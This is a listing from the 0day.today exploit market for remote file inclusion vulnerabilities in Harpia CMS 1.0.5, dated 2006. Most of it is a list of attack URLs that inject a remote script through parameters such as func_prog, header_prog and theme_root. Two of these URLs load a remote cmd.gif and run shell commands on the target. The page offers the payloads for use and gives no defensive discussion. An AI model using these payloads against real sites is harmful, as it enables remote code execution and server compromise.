[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities

Author
Kw3[R]Ln
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-540
Category
web applications
Date add
21-06-2006
Platform
unsorted
=======================================================
Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities
=======================================================


---------------------------------------------------------------------------
Harpia CMS <= 1.0.5 Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Discovered By Kw3[R]Ln [ Romanian Security Team ]
Remote : Yes
Critical Level : Dangerous

---------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Harpia
version : LATEST VERSION 1.0.5
URL : http://sourceforge.net/projects/harpia

------------------------------------------------------------------
Exploit:
~~~~~~~

http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
http://www.site.com/missing.php?header_prog=[Evil_Script]
http://www.site.com/_inc/footer.php?theme_root=[Evil_Script]
http://www.site.com/_inc/header.php?mod_root=[Evil_Script]
http://www.site.com/_inc/header.php?theme_root=[Evil_Script]
http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script]
http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script]
http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script]
http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script]
http://www.site.com/_mods/email.php?header_prog=[Evil_Script]
http://www.site.com/_mods/files.php?header_prog=[Evil_Script]
http://www.site.com/_mods/files.php?footer_prog=[Evil_Script]
http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script]
http://www.site.com/_mods/search.php?header_prog=[Evil_Script]
http://www.site.com/_mods/topics.php?header_prog=[Evil_Script]
http://www.site.com/_mods/users.php?header_prog=[Evil_Script]


-------------------------------- [ EOF] ----------------------------------



#  0day.today [2024-09-28]  #